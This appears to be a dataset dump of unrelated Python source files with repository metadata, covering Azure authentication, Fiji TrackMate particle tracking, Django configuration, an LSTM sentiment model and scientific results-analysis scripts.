class CertificateCredential(CertificateCredentialBase, AsyncCredentialBase):
"""Authenticates as a service principal using a certificate.
:param str tenant_id: ID of the service principal's tenant. Also called its 'directory' ID.
:param str client_id: the service principal's client ID
:param str certificate_path: path to a PEM-encoded certificate file including the private key
:keyword str authority: Authority of an Azure Active Directory endpoint, for example 'login.microsoftonline.com',
the authority for Azure Public Cloud (which is the default). :class:`~azure.identity.KnownAuthorities`
defines authorities for other clouds.
:keyword password: The certificate's password. If a unicode string, it will be encoded as UTF-8. If the certificate
requires a different encoding, pass appropriately encoded bytes instead.
:paramtype password: str or bytes
"""
async def __aenter__(self):
await self._client.__aenter__()
return self
async def close(self):
"""Close the credential's transport session."""
await self._client.__aexit__()
async def get_token(self, *scopes: str, **kwargs: "Any") -> "AccessToken": # pylint:disable=unused-argument
"""Asynchronously request an access token for `scopes`.
.. note:: This method is called by Azure SDK clients. It isn't intended for use in application code.
:param str scopes: desired scopes for the access token. This method requires at least one scope.
:rtype: :class:`azure.core.credentials.AccessToken`
:raises ~azure.core.exceptions.ClientAuthenticationError: authentication failed. The error's ``message``
attribute gives a reason. Any error response from Azure Active Directory is available as the error's
``response`` attribute.
"""
if not scopes:
raise ValueError("'get_token' requires at least one scope")
token = self._client.get_cached_access_token(scopes, query={"client_id": self._client_id})
if not token:
token = await self._client.obtain_token_by_client_certificate(scopes, self._certificate, **kwargs)
return token
def _get_auth_client(self, tenant_id, client_id, **kwargs):
return AadClient(tenant_id, client_id, **kwargs)
| [
"noreply@github.com"
] | emreyalcin26.noreply@github.com |
9e21624177893a8afea8146b900298f4c78daefc | 4638713ac25503369f4b7dd7ddeac9baf5f61405 | /Invasionmate.py | 025dbbb0339b8b446ee444e39cd4acfbe87154c4 | [] | no_license | jrijn/IJ_analysis_tool | 0161e91ff0ce9dca269bfb7986ae9e1252017248 | 0a0477dfe99b5b5debc7c60090f9e9b527500d4d | refs/heads/master | 2021-06-24T21:33:23.224904 | 2021-04-23T10:02:37 | 2021-04-23T10:02:37 | 221,932,541 | 0 | 0 | null | 2020-08-25T09:46:02 | 2019-11-15T13:45:35 | Python | UTF-8 | Python | false | false | 5,072 | py | from ij import IJ, WindowManager
from fiji.plugin.trackmate import Model
from fiji.plugin.trackmate import Settings
from fiji.plugin.trackmate import TrackMate
from fiji.plugin.trackmate import SelectionModel
from fiji.plugin.trackmate import Logger
from fiji.plugin.trackmate.detection import LogDetectorFactory
from fiji.plugin.trackmate.tracking.sparselap import SparseLAPTrackerFactory
from fiji.plugin.trackmate.tracking import LAPUtils
from ij import IJ
import fiji.plugin.trackmate.visualization.hyperstack.HyperStackDisplayer as HyperStackDisplayer
import fiji.plugin.trackmate.features.FeatureFilter as FeatureFilter
import sys
import fiji.plugin.trackmate.features.track.TrackDurationAnalyzer as TrackDurationAnalyzer
# Get currently selected image
# imp = WindowManager.getCurrentImage()
imp = IJ.openImage('http://fiji.sc/samples/FakeTracks.tif')
imp.show()
# ----------------------------
# Create the model object now
# ----------------------------
# Some of the parameters we configure below need to have
# a reference to the model at creation. So we create an
# empty model now.
model = Model()
# Send all messages to ImageJ log window.
model.setLogger(Logger.IJ_LOGGER)
# ------------------------
# Prepare settings object
# ------------------------
settings = Settings()
settings.setFrom(imp)
# Configure detector - We use the Strings for the keys
settings.detectorFactory = LogDetectorFactory()
settings.detectorSettings = {
'DO_SUBPIXEL_LOCALIZATION': True,
'RADIUS': 2.5,
'TARGET_CHANNEL': 1,
'THRESHOLD': 0.,
'DO_MEDIAN_FILTERING': False,
}
# Configure spot filters - Classical filter on quality
# filter1 = FeatureFilter('QUALITY', 30, True)
# settings.addSpotFilter(filter1)
# Configure tracker - We want to allow merges and fusions
settings.trackerFactory = SparseLAPTrackerFactory()
settings.trackerSettings = LAPUtils.getDefaultLAPSettingsMap() # almost good enough
settings.trackerSettings['LINGKING_MAX_DISTANCE'] = 10.0
settings.trackerSettings['GAP_CLOSING_MAX_DISTANCE'] = 10.0
settings.trackerSettings['MAX_FRAME_GAP'] = 240
settings.trackerSettings['ALLOW_TRACK_SPLITTING'] = True
settings.trackerSettings['ALLOW_TRACK_MERGING'] = True
# Add the analyzers for some spot features.
# You need to configure TrackMate with analyzers that will generate
# the data you need.
# Here we just add two analyzers for spot, one that computes generic
# pixel intensity statistics (mean, max, etc...) and one that computes
# an estimate of each spot's SNR.
# The trick here is that the second one requires the first one to be in
# place. Be aware of this kind of gotchas, and read the docs.
settings.addSpotAnalyzerFactory(SpotIntensityAnalyzerFactory())
settings.addSpotAnalyzerFactory(SpotContrastAndSNRAnalyzerFactory())
# Configure track analyzers - Later on we want to filter out tracks
# based on their displacement, so we need to state that we want
# track displacement to be calculated. By default, out of the GUI,
# not features are calculated.
# The displacement feature is provided by the TrackDurationAnalyzer.
settings.addTrackAnalyzer(TrackDurationAnalyzer())
# Configure track filters - We want to get rid of the two immobile spots at
# the bottom right of the image. Track displacement must be above 10 pixels.
filter2 = FeatureFilter('TRACK_DISPLACEMENT', 10, True)
settings.addTrackFilter(filter2)
# -------------------
# Instantiate plugin
# -------------------
trackmate = TrackMate(model, settings)
# --------
# Process
# --------
ok = trackmate.checkInput()
if not ok:
sys.exit(str(trackmate.getErrorMessage()))
ok = trackmate.process()
if not ok:
sys.exit(str(trackmate.getErrorMessage()))
# ----------------
# Display results
# ----------------
model.getLogger().log('Found ' + str(model.getTrackModel().nTracks(True)) + ' tracks.')
selectionModel = SelectionModel(model)
displayer = HyperStackDisplayer(model, selectionModel, imp)
displayer.render()
displayer.refresh()
# Echo results with the log\ger we set at start:
# model.getLogger().log(str(model))
# The feature model, that stores edge and track features.
fm = model.getFeatureModel()
for id in model.getTrackModel().trackIDs(True):
# Fetch the track feature from the feature model.
v = fm.getTrackFeature(id, 'TRACK_MEAN_SPEED')
model.getLogger().log('')
model.getLogger().log(
'Track ' + str(id) + ': mean velocity = ' + str(v) + ' ' + model.getSpaceUnits() + '/' + model.getTimeUnits())
track = model.getTrackModel().trackSpots(id)
for spot in track:
sid = spot.ID()
# Fetch spot features directly from spot.
x = spot.getFeature('POSITION_X')
y = spot.getFeature('POSITION_Y')
t = spot.getFeature('FRAME')
q = spot.getFeature('QUALITY')
snr = spot.getFeature('SNR')
mean = spot.getFeature('MEAN_INTENSITY')
model.getLogger().log(
'\tspot ID = ' + str(sid) + ': x=' + str(x) + ', y=' + str(y) + ', t=' + str(t) + ', q=' + str(
q) + ', snr=' + str(snr) + ', mean = ' + str(mean))
| [
"jorik.vanrijn@gmail.com"
] | jorik.vanrijn@gmail.com |
aa3cad735dc9453629e4cb87982cd2dc96c5743e | 32cb84dd41e4be24c065bb205f226f9b121a6db2 | /antiddos/policy.py | eea1a79695c59d373b35ac96a1b19ba7d74d6620 | [] | no_license | InformatykaNaStart/staszic-sio2 | b38fda84bd8908472edb2097774838ceed08fcfa | 60a127e687ef8216d2ba53f9f03cfaa201c59e26 | refs/heads/master | 2022-06-29T11:09:28.765166 | 2022-06-13T21:56:19 | 2022-06-13T21:56:19 | 115,637,960 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | from oioioi.evalmgr.models import QueuedJob
from django.conf import settings
def queued_submissions_of(user):
return QueuedJob.objects.filter(state='WAITING',submission__user=user).count()
def get_queued_submissions_limit():
return getattr(settings, 'MAX_QUEUED_SUBMISSIONS_PER_USER', 10**3)
def can_submit(user):
if user.is_superuser: return True
return queued_submissions_of(user) < get_queued_submissions_limit()
| [
"hugo@staszic.waw.pl"
] | hugo@staszic.waw.pl |
9398c18330db53a85c1938ebce7874076d6a6f55 | c617c372853c145055b652ef8fb75591abdb78c8 | /bloggers/admin.py | 40ec799e2081493dd081f148ee89e6a60c16f828 | [] | no_license | vladrashkevich/Myproject | 158de08546d098c2f7144341f61da1e51ad05d17 | d312025c782baf43b4adb6893f1a03b7f8c59145 | refs/heads/master | 2023-08-24T20:25:16.734975 | 2021-09-23T04:51:25 | 2021-09-23T04:51:25 | 404,774,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | from django.contrib import admin
from .models import *
class BloggersAdmin(admin.ModelAdmin):
list_display = ('id', 'title', 'time_create', 'photo', 'is_published')
list_display_links = ('id', 'title')
search_fields = ('title', 'content')
list_editable = ('is_published',)
list_filter = ('is_published', 'time_create')
prepopulated_fields = {'slug': ('title',)}
class CategoryAdmin(admin.ModelAdmin):
list_display = ('id', 'name')
list_display_links = ('id', 'name')
search_fields = ('name',)
prepopulated_fields = {'slug': ('name',)}
admin.site.register(Bloggers, BloggersAdmin)
admin.site.register(Category, CategoryAdmin)
| [
"vladrashkevich@mail.ru"
] | vladrashkevich@mail.ru |
c2b9c4e1a0a40e3c55b88feb06af86b10bb8ded9 | ed757d437952d884533dfc845e365f2c5c4714a4 | /test_aho.py | 566a1429256b8524c1965824dcd138f5ff74efae | [
"MIT"
] | permissive | guilhermedelyra/aho-spell_correction | da48d927de4591743df7d47b5e64c8c301db9a79 | e2978c6cda3d35dab2da559e24fe359c3127627f | refs/heads/master | 2020-03-30T17:37:38.672346 | 2018-10-03T18:49:18 | 2018-10-03T18:49:18 | 151,463,134 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | key = ["his", "her", "she", "he", "ka"]
text = "hishers kaka"
import aho
z = aho.search(key, text)
print(z)
| [
"guilyra12@gmail.com"
] | guilyra12@gmail.com |
907eb0f09b9234d3d0e14374b2d3e65fe6bf9c63 | f4077ccd3eccf74151115e9ff71bf3dcbd2e7785 | /process_corpus.py | 253a49c127b18d656da56b4a48c2dc8c8b54edbc | [] | no_license | Celiacaoyanan/Topic_Model | 80a291b7423eeed5119fd5b5bfe618fbd3f780d3 | f3bd3442a22a60a8a92de9a199daa1fefa5f4cdd | refs/heads/master | 2021-01-11T02:19:16.456827 | 2019-02-20T01:10:13 | 2019-02-20T01:10:13 | 70,982,992 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,989 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
process_corpus_1 is used to process corpus where there are contents after a colon and change them to one word every line
Example of one line in raw corpus: 环境科学:环境科学,环科,环境科学,环境
after processed: 环境科学
环科
环境科学
环境
process_corpus_2 is used to combine all the dictionaries into one
"""
import os
import optparse
class Process_Corpus:
def __init__(self, dict_dir):
self.dict_dir = dict_dir
def process_corpus_1(self):
f1 = open('dict_edu1.txt', 'w')
fname_list = os.listdir(self.dict_dir)
for fname in fname_list: # for every dictionary file in the directory
with open(self.dict_dir + '//' + fname, 'r')as f:
f2 = f.readlines()
for line in f2: # for every line in the dictionary file
list=line.split(":")[1].split(",") # split the line into 2 parts by colon and split 2nd part by comma
for w in list:
w = w.strip()
f1.write(w)
f1.write('\n')
def process_corpus_2(self):
f1 = open('dict_edu.txt', 'w')
fname_list = os.listdir(self.dict_dir)
for fname in fname_list:
with open(self.dict_dir + '//' + fname, 'r')as f:
f2 = f.readlines()
for w in f2:
w = w.strip()
f1.write(w)
f1.write('\n')
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option("-d", dest="dict_dir", help="directory of dictionary")
parser.add_option("-t", dest="type", help="1 or 2")
(options, args) = parser.parse_args()
if options.type == '1':
pc = Process_Corpus(options.dict_dir)
pc.process_corpus_1()
if options.type == '2':
pc = Process_Corpus(options.dict_dir)
pc.process_corpus_2() | [
"celiacaoyanan@outlook.com"
] | celiacaoyanan@outlook.com |
fdb2e6f22a3790678cbbe3a58c685e76c19f6da1 | d3aac9f68cd3359d4f42bde16e7d6855015bfa25 | /coolsite/coolsite/urls.py | c2c3e3b9cfd028253c70b50ed83ebd7bca7a2c0c | [] | no_license | my4ever/coolsite | 539e21e95f2da79d1af4dbbb3e7d2bd3bc6257b9 | 7b48f3d2f725a78cd95ca887e085568f7c547f83 | refs/heads/main | 2023-06-26T23:55:55.670869 | 2021-07-30T17:35:30 | 2021-07-30T17:35:30 | 390,052,796 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include
from . import settings
from woman.views import page_not_found
urlpatterns = [
path('admin/', admin.site.urls),
path('captcha/', include('captcha.urls')),
path('', include('woman.urls')),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns = [
path('__debug__/', include(debug_toolbar.urls)),
] + urlpatterns
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
handler404 = page_not_found | [
"goodbuhlnr@yandex.ua"
] | goodbuhlnr@yandex.ua |
656c4bcc2e28b5938448e7b70cf38bafc93e704e | 5a4f1e3013290d331d2a1e69daa69c29882fb97c | /asynclib/base_events.py | 297e94c06411df242ff3ccb72025edad82377e36 | [] | no_license | pfmoore/asynclib | 308e28609f28638f7a05c2c8e3f1fde9aa72e984 | b03979cd532632e5165a8d35f2024ce2ea8dfc5b | refs/heads/master | 2021-01-22T03:08:52.297430 | 2015-05-16T12:02:41 | 2015-05-16T12:02:41 | 35,449,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,591 | py | """Event loop."""
from .tasks import Task
class EventLoop:
def __init__(self):
self.ready = []
self.call_soon_queue = []
self.running = False
def call_soon(self, fn):
self.call_soon_queue.append(fn)
def _run_one_step(self):
while self.call_soon_queue:
fn = self.call_soon_queue.pop(0)
fn()
if not self.ready:
return
current = self.ready[0]
try:
next(current)
except StopIteration:
self.unschedule(current)
else:
if self.ready and self.ready[0] is current:
# current is hogging the "next available" slot.
# Implement a fairness algorithm here - in this case,
# just move it to the back to give a "round robin"
# algorithm
del self.ready[0]
self.ready.append(current)
def run_forever(self):
self.running = True
while self.running and self.ready:
self._run_one_step()
def run_until_complete(future):
pass
def is_running(self):
return self.running
def stop(self):
self.running = False
def schedule(self, coro):
self.ready.append(coro)
def unschedule(self, coro):
if coro in self.ready:
self.ready.remove(coro)
def create_task(self, coro):
t = Task(coro, loop=self) # self.schedule(coro)
def get_debug(self):
return False
def call_exception_handler(self, *args):
print(args)
loop = EventLoop()
| [
"p.f.moore@gmail.com"
] | p.f.moore@gmail.com |
f2d870ea60c114be0dfb7f2f551b3c0f0b4a0a48 | 3bb57eb1f7c1c0aced487e7ce88f3cb84d979054 | /qats/scripts/evaluators/formatted_accuracy.py | 5ab4d2d8e8201b614d6d230be335d6d736d814a5 | [] | no_license | ghpaetzold/phd-backup | e100cd0bbef82644dacc73a8d1c6b757b2203f71 | 6f5eee43e34baa796efb16db0bc8562243a049b6 | refs/heads/master | 2020-12-24T16:41:21.490426 | 2016-04-23T14:50:07 | 2016-04-23T14:50:07 | 37,981,094 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,785 | py | import os
from tabulate import tabulate
from scipy.stats import spearmanr
def getAccuracy(pred, gold):
right = 0.0
for i in range(0, len(pred)):
if pred[i]==gold[i]:
right += 1.0
return right/len(pred)
types = ['G', 'M', 'S', 'O']
systems = sorted(os.listdir('../../labels/G'))
names = {}
names['nn'] = 'SimpleNets-RNN3'
names['nn_adadelta'] = 'SimpleNets-RNN2'
names['nn_mlp'] = 'SimpleNets-MLP'
names['adaboost'] = 'Ada Boosting'
names['dectrees'] = 'Decision Trees'
names['gradientboost'] = 'Gradient Boosting'
names['randomforest'] = 'Random Forests'
names['sgd'] = 'SGD'
names['svm'] = 'SVM'
names['allgood'] = 'All Good'
names['allok'] = 'All Ok'
names['allbad'] = 'All Bad'
scores = {}
for system in systems:
scores[system] = []
for type in types:
gold = [item.strip().split('\t')[2] for item in open('../../corpora/'+type+'_test.txt')]
golds = [float(item.strip().split('\t')[2]) for item in open('../../corpora/'+type+'_test.txt')]
for system in systems:
files = os.listdir('../../labels/'+type+'/'+system)
maxacc = -1
maxspear = 0
maxfile = None
for file in files:
pred = [item.strip().split('\t')[0] for item in open('../../labels/'+type+'/'+system+'/'+file)]
preds = [float(item.strip().split('\t')[1]) for item in open('../../labels/'+type+'/'+system+'/'+file)]
preds[0] = preds[0]+0.00000001
acc = getAccuracy(pred, gold)
if acc>maxacc:
maxacc = acc
maxfile = file
spear, f = spearmanr(preds, golds)
if acc>maxspear:
maxspear = spear
scores[system].append((maxacc, maxspear))
for system in sorted(scores.keys()):
if system in names:
newline = names[system]
for value in scores[system]:
newline += r' & $' + "%.3f" % value[0] + r'$ & $' + "%.3f" % value[1] + r'$'
newline += r' \\'
print(newline)
| [
"ghpaetzold@outlook.com"
] | ghpaetzold@outlook.com |
c1884f52d246e17dca03adb0fd99542855b4c864 | 34813fb1156d39a56a00e6e513c19bf0acb22fd2 | /author/admin_flymake.py | 197a1c35c795a89db8fea72b58f1d73653f800fc | [] | no_license | brahle/bullshitbingo | 8e6bd6620c6d9827e79028eb6baf9283da451145 | 3d1eb8810818d1de5a0f3e202e7b35f0ac687c50 | refs/heads/master | 2016-09-05T23:53:29.923667 | 2012-02-05T23:24:45 | 2012-02-05T23:29:51 | 1,101,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | from author.models import Author
| [
"brahle+github@gmail.com"
] | brahle+github@gmail.com |
c5b6311ff0ad31c6a5b3db674ce7c7ed98b290d1 | eb3ec365dab96330d0614995ef7f8729e82cd7dc | /Homework_7_NLP/Part_3_Code/util_Sentiment.py | baa9ca7a29d5251b462e25c5543f4bf5f62fc35d | [
"MIT"
] | permissive | keynhu/IE-534-Deep-Learning | 0d8949499e1b68dc14e3b9315b16b19c9a49ccf6 | bd4bcfe424385040a64c1b736689d1870a5d8709 | refs/heads/master | 2020-03-30T10:00:56.347453 | 2019-02-21T07:26:38 | 2019-02-21T07:26:38 | 151,102,071 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,963 | py | # Import modules
import numpy as np
import itertools
import os
import shutil
import io
import torch
import torch.nn as nn
import torch.utils.data as Data
import torch.autograd.variable as Variable
import torchvision
import torchvision.transforms as transforms
# Device configuration
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
class StatefulLSTM(nn.Module):
def __init__(self, in_size, out_size):
super(StatefulLSTM, self).__init__()
self.lstm = nn.LSTMCell(in_size, out_size)
self.out_size = out_size
self.h = None
self.c = None
def reset_state(self):
self.h = None
self.c = None
def forward(self,x):
batch_size = x.data.size()[0]
if self.h is None:
state_size = [batch_size, self.out_size]
self.h = torch.zeros(state_size).to(device)
self.c = torch.zeros(state_size).to(device)
self.h, self.c = self.lstm(x, (self.h, self.c))
return self.h
class LockedDropout(nn.Module):
def __init__(self):
super(LockedDropout,self).__init__()
self.m = None
def reset_state(self):
self.m = None
def forward(self, x, dropout=0.5, train=True):
if train==False:
return x
if(self.m is None):
self.m = x.data.new(x.size()).bernoulli(1 - dropout)
mask = Variable(self.m, requires_grad=False) / (1 - dropout)
return mask * x
class RNN_model(nn.Module):
def __init__(self, vocab_size, no_of_hidden_units):
super(RNN_model, self).__init__()
self.embedding = nn.Embedding(vocab_size,no_of_hidden_units) #,padding_idx=0)
self.lstm1 = StatefulLSTM(no_of_hidden_units, no_of_hidden_units)
self.bn_lstm1 = nn.BatchNorm1d(no_of_hidden_units)
self.dropout1 = LockedDropout() #torch.nn.Dropout(p=0.5)
self.lstm2 = StatefulLSTM(no_of_hidden_units, no_of_hidden_units)
self.bn_lstm2 = nn.BatchNorm1d(no_of_hidden_units)
self.dropout2 = LockedDropout() #torch.nn.Dropout(p=0.5)
self.lstm3 = StatefulLSTM(no_of_hidden_units, no_of_hidden_units)
self.bn_lstm3 = nn.BatchNorm1d(no_of_hidden_units)
self.dropout3 = LockedDropout() #torch.nn.Dropout(p=0.5)
self.fc_output = nn.Linear(no_of_hidden_units, 1)
#self.loss = nn.CrossEntropyLoss() # When doing multiple classification
self.loss = nn.BCEWithLogitsLoss() # When doing binary classification
def reset_state(self):
self.lstm1.reset_state()
self.dropout1.reset_state()
self.lstm2.reset_state()
self.dropout2.reset_state()
self.lstm3.reset_state()
self.dropout3.reset_state()
def forward(self, x, t, train=True):
embed = self.embedding(x) # (batch_size, time_steps, features(i.e. no_of_hidden_units))
no_of_timesteps = embed.shape[1] # Length of sentence
self.reset_state()
outputs = []
for i in range(no_of_timesteps):
h = self.lstm1(embed[:,i,:])
h = self.bn_lstm1(h)
h = self.dropout1(h,dropout=0.3,train=train) # (batch_size, no_of_hidden_units)
h = self.lstm2(h)
h = self.bn_lstm2(h)
h = self.dropout2(h,dropout=0.3,train=train)
h = self.lstm3(h)
h = self.bn_lstm3(h)
h = self.dropout3(h,dropout=0.3,train=train)
outputs.append(h)
outputs = torch.stack(outputs) # (time_steps, batch_size, features)
outputs = outputs.permute(1,2,0) # (batch_size,features,time_steps), representing a batch of sentences
pool = nn.MaxPool1d(no_of_timesteps)
h = pool(outputs)
h = h.view(h.size(0),-1) # (batch_size, features)
#h = self.dropout(h)
h = self.fc_output(h) # (batch_size, 1)
return self.loss(h[:,0],t), h[:,0] #F.softmax(h, dim=1)
| [
"noreply@github.com"
] | keynhu.noreply@github.com |
054f887e8c4840d4bc053e6bff6ad27cf618f5ff | 1b18db113edef02932a3aae1c6d692bec8a52a31 | /results-analysis/results-Pd1.py | cd4b536a74e1b24317171874ee62bc184ce8f95b | [] | no_license | aljamaha/Zeolite | 20a656caa686b620e5c1c2f216f00472aca416c0 | 963d5b274409266af2944c279a11268be339a1f1 | refs/heads/master | 2021-08-10T10:48:20.863434 | 2021-07-23T07:18:00 | 2021-07-23T07:18:00 | 221,759,500 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,870 | py | import json, os
import matplotlib.pyplot as plt
from ase import atoms, io
from copy import deepcopy
from functions import *
import numpy as np
from oxygen_stable import *
'''
Results Analysis
'''
'Inputs'
plotting = False #if True, plot results for each reference structure
sorted_plot = True #if True, bar plots of energies is sorted from lowest to highest
plt_ref_label = False #if True, add label of the reference to the overall plot
O_n = False #if True, color code plot based on cation-O distance
dir_Pd = 'BEA/Pd1/' #name of dir where the calculations are saved
dir_H = 'BEA/H/' #name of directory where comensating protons are saved
exchange = 'omega'
calc_type = 'sp' #opt or sp
'Directory names'
data_dir = '/home/aljama/'+dir_Pd+'/data/' #dir where json data are saved
calc_dir = '/home/aljama/'+dir_Pd+'/calculations/' #dir where calculations are done
results_dir = '/home/aljama/'+dir_Pd+'/results-analysis/' #dir where results are to be saved
H_data = '/home/aljama/'+dir_H+'/data/' #dir where data for H adsorptions sites are saved
candidates = [] #run hGGA calc on those
'Load data from json files'
with open(data_dir+"data_output.json", "r") as read_file:
data_output = json.load(read_file)
with open(data_dir+"data.json", "r") as read_file:
data_original = json.load(read_file)
'accumulate reference entries (templates from which calculations were created and run)'
references = {} #references for data
for item in data_original:
'entries in references dictionary'
if data_original[item]['reference'] not in references:
references[data_original[item]['reference']] = []
for ref in references:
'name of folders that share same reference'
for item in data_original:
if data_original[item]['reference'] == ref:
if ref != item:
references[ref].append(item)
'accumulate traj files'
Pd_H_d, Pd_H_d_all, minimum = {},[],{} #saves minimum energy for each reference [minimum['3.traj'] = 22.traj]
Al_distance, n_O,n,oxygen_distances= {},{},{},{}
O_Al,O_Si = {},{}
for ref in references:
'loop over each reference'
x_pos, E, first_item, O_d, label, candidates = [],[], True, [],[],[] #For plotting purposes
for item in references[ref]:
'each item under reference'
index = item[0:-5] #remves .traj from the name
data_output_entry = calc_index(index, data_output, exchange, calc_type) #check corresponding name in data_output
if data_output_entry != 'none':
'check calcuation dir is available'
try:
if data_output[data_output_entry]['status'] == 'complete':
'check calc is completed, then copy traj files to new folder'
x_pos.append(int(index)) #x-asis position
if first_item == True:
E_ref = data_output[data_output_entry]['energy']
E.append( (data_output[data_output_entry]['energy']- E_ref)*27.2114 ) #convert from Hartree to e. values of energies for y-axis
first_item = False
label.append(index)
'Al-Al distance'
atoms = io.read(calc_dir+data_output_entry+'/qm-initial.traj')
Al_distance[ref], n_Al = Al_Al(atoms)
'# of oxygens next to Al'
if O_n == True:
O_Al[item], O_Si[item], oxygen_distances[item] = cation_n_O('Pd',atoms,cutoff=2.51)
#atoms_tmp = io.read(calc_dir+data_output_entry+'/input.xyz')
#O_Al[item], O_Si[item], oxygen_distances[item] = cation_n_O('Pd',atoms_tmp,cutoff=2.51)
'O-O distance'
#O_O_distance = O_O(atoms, n_Al)
#O_d.append( round(O_O_distance,3) )
'Pd-H distance'
Pd_H_distance = Pd_H(atoms, n_Al)
Pd_H_d[item] = Pd_H_distance
except:
pass
if sorted_plot == True:
if len(E) >0: #avoid references not calculated yet
'bar plot (sorted)'
new_x, new_E, x_pts = sort(x_pos, E)
print(ref, len(new_x), new_x[0:13])
plt.bar(x_pts, new_E, align='center', alpha=1)
plt.xticks(x_pts, new_x)
plt.ylabel('Energy (eV)')
if plotting == True:
plt.show()
'save first structure as the minimum energy'
try:
minimum[ref] = new_x[0]
except:
minimum[ref] = ''
else:
'bar plot (not sorted)'
plt.bar(x_pos, E, align='center', alpha=1)
plt.xticks(x_pos, x_pos)
plt.ylabel('Energy (eV)')
if plotting == True:
plt.show()
'''Plot rxn energy [bar plot]'''
E,E_label,ref_label, first_item = [],[],{}, True
coloring,shade,edge,MR4 = {},{},{},{}
for entry in minimum:
if minimum[entry] != '':
ref_H = data_original[entry]['reference'] #reference for 16 H calculations
zeolite_H = min_H(ref_H, H_data, calc_type)
if zeolite_H != 0:
'zeolite_H == 0 means that some calc are incomplete'
data_output_entry = calc_index(str(minimum[entry]), data_output, exchange, calc_type) #check corresponding name in data_output
E_qmmm = data_output[data_output_entry]['energy']
E_rxn = rxn_energy(E_qmmm, zeolite_H, 1)
E.append(E_rxn)
E_label.append(minimum[entry])
ref_label[minimum[entry]] = entry
if data_original[entry]['Al'] == 1:
coloring[entry] = 'y'
edge[entry] = 'y'
elif data_original[entry]['Al-Al MR'] == [5,5]:
coloring[entry] = 'r'
edge[entry] = 'r'
elif data_original[entry]['Al-Al MR'] == [6,6]:
coloring[entry] = 'b'
edge[entry] = 'b'
elif data_original[entry]['Al-Al MR'] == [4,4]:
coloring[entry] = 'g'
edge[entry] = 'g'
else:
coloring[entry] = 'c'
edge[entry] = 'c'
if data_original[entry]['N'] == 'NNN':
shade[entry] = '**'
else:
shade[entry] = ''
#if data_original[entry]['Al MR']['4']>2:
# MR4[entry] = True
#else:
# #print('{} H calculations are incomplete'.format(entry))
plt.clf() #clear plot
'Overall Pd Rxn energy plot'
new_x, new_E, x_pts = sort(E_label, E)
k = 0
ref_list = []
for index, item in enumerate(new_E):
k+=1
ref = ref_label[new_x[index]]
ref_list.append(ref)
name = str(new_x[index])+'.traj'
'''
if ref in data_T[str(T)]:
plt.bar(x_pts[index], new_E[index],color=coloring[ref_label[new_x[index]]], edgecolor='k', linewidth=4,align='center', alpha=1)
else:
plt.bar(x_pts[index], new_E[index],color=coloring[ref_label[new_x[index]]], linewidth=4,align='center', alpha=1)
'''
#print(name, O_Al[name], O_Si[name], oxygen_distances[name])
try:
if O_n != True:
#plt.bar(x_pts[index], new_E[index], color=coloring[ref], edgecolor='k', linewidth=4,align='center', alpha=1)
plt.bar(x_pts[index], new_E[index], color=coloring[ref], hatch=shade[ref], align='center', alpha=0.9)
else:
#if O_Al[name] + O_Si[name] == 4:
if O_Al[name] == 4:
plt.bar(x_pts[index], new_E[index], color='g', hatch=shade[ref], align='center', alpha=0.9)
#plt.bar(x_pts[index], new_E[index], color='k', hatch=shade[ref], edgecolor= edge[ref], align='center', alpha=0.9)
#print(new_x[index], n[name])
#elif O_Al[name] + O_Si[name] == 3:
elif O_Al[name] == 3:
plt.bar(x_pts[index], new_E[index], color='r', hatch=shade[ref], align='center', alpha=0.9)
#plt.bar(x_pts[index], new_E[index], color='c', hatch=shade[ref], edgecolor= edge[ref], align='center', alpha=0.9)
#print(new_x[index], n[name])
#elif O_Al[name] + O_Si[name] == 2:
elif O_Al[name] == 2:
plt.bar(x_pts[index], new_E[index], color='b', hatch=shade[ref], align='center', alpha=0.9)
else:
print(O_Al[name] + O_Si[name])
plt.bar(x_pts[index], new_E[index], color='y', hatch=shade[ref], align='center', alpha=0.9)
#plt.bar(x_pts[index], new_E[index], color='y', hatch=shade[ref], edgecolor= edge[ref], align='center', alpha=0.9)
try:
plt.text(x_pts[index], np.max(new_E)+0.12, str(O_Si[name]), color='k',rotation = 90, fontsize=12)
except:
pass
if plt_ref_label == True:
plt.text(x_pts[index], min(new_E)-0.1, ref, color='k',rotation = 90, fontsize=12)
#plt.text(x_pts[index], min(new_E)+0.1, n_O[ref], color='k',rotation = 90, fontsize=12)
except:
print('Failed', name)
pass
plt.ylim([np.min(new_E)-0.1, np.max(new_E)+0.1])
plt.xticks(x_pts, new_x, rotation = 90)
plt.ylabel('Energy (eV)')
plt.show()
plt.clf()
'Pd-H distance plot'
for index, item in enumerate(E_label):
#print(E_label[index], E[index], index)
plt.plot(Pd_H_d[str(item)+'.traj'], E[index],'ko')
plt.show()
print('ref list', ref_list)
print('energies', new_E)
'Al-Al Distance'
for index, item in enumerate(new_E):
ref = ref_label[new_x[index]]
#try:
# if MR4[ref] == True:
# plt.plot(Al_distance[ref], new_E[index],'sk',markersize=9)
#except:
# pass
try:
#if ref in inaccessible:
# plt.plot(Al_distance[ref], new_E[index],'sk',markersize=9)
if shade[ref] == '**':
plt.plot(Al_distance[ref], new_E[index],coloring[ref]+'^',markersize=6)
else:
plt.plot(Al_distance[ref], new_E[index],coloring[ref]+'o',markersize=6)
except:
pass
plt.xlim([3, 8])
plt.xlabel('Al-Al distance (A)')
plt.ylabel('Pd Rxn Energy (eV)')
plt.show()
| [
"aljamaha@stanford.edu"
] | aljamaha@stanford.edu |
